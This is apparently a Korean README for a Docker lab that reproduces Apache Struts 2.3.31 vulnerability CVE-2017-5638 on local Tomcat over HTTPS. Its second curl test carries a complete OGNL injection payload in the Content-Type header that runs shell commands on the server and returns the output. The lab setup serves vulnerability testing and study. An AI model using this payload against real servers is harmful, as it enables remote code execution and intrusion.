
struts-2.3.31 (CVE-2017-5638) 환경 구축
struts-2.3.31 (CVE-2017-5638) 환경을 구축합니다. https 요청이 가능합니다.
Ubuntu 20.04 Docker 20.10.12 curl 7.68.0
tomcat:7.0-jre8 docker 이미지를 사용합니다. 원하는 디렉터리에 struts-2.3.31.zip의 압축을 해제합니다. cd struts-2.3.31 sudo docker build -t struts/2_3_31 . sudo docker run -it --rm -p 8443:8443 struts/2_3_31
하나(200 OK 예상) curl --location --request GET 'https://127.0.0.1:8443/struts2-showcase/showcase.action' -k -I
다른 하나(200 OK 예상) curl --location --request GET 'https://127.0.0.1:8443/struts2-showcase/showcase.action' --header 'Content-Type: %{(#_='''multipart/form-data''').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['''com.opensymphony.xwork2.ActionContext.container''']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='''ls''').(#iswin=(@java.lang.System@getProperty('''os.name''').toLowerCase().contains('''win'''))).(#cmds=(#iswin?{'''cmd.exe''','''/c''',#cmd}:{'''/bin/bash''','''-c''',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}' -k
struts2-showcase.war는 아래에서 다운로드됩니다. https://archive.apache.org/dist/struts/2.3.31/
server.xml은 tomcat 설정 파일입니다. SSL을 활성화하도록 편집되었습니다.